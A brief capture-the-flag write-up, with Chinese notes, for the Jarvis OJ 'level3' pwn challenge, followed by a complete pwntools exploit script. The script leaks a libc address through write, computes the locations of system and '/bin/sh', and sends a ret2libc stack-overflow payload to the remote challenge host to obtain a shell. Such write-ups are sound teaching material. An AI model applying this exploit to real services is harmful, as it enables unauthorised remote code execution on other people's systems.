jarvis oj PWN - level3

思路：
1.使用write 泄漏出 got地址, 通过libc计算偏移得到system, binsh
2.覆盖ebp返回主函数再次执行
3.这次覆盖ebp执行system /bin/sh。

关键传参: write_addr, 返回地址, 1, output, 4(4字节)

from pwn import *

is_debug = False
# is_debug = True
# context(log_level='debug', arch='i386', os='linux')

io = remote("pwn2.jarvisoj.com", 9879)
# io = process('level3')

if is_debug:
    gdb.attach(io, '''
    b *0x08048483
    ''')

e = ELF('level3')
main_addr = e.symbols['vulnerable_function']
write_plt = e.symbols['write']
write_got = e.got['write']

# libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('libc-2.19.so')
libc_write = libc.symbols['write']

junk = (0x88 + 4) * b'a'
payload1 = flat(junk, write_plt, main_addr, 1, write_got, 4)
r = io.recvline()
print('recv is ', r)
io.sendline(payload1)
addr = io.recv()[:4]
true_address = u32(addr)
offset = true_address - libc_write

system = libc.symbols['system'] + offset
sh_addr = libc.search(b'/bin/sh').__next__() + offset
payload2 = flat(junk, system, 1, sh_addr)
io.sendline(payload2)
io.interactive()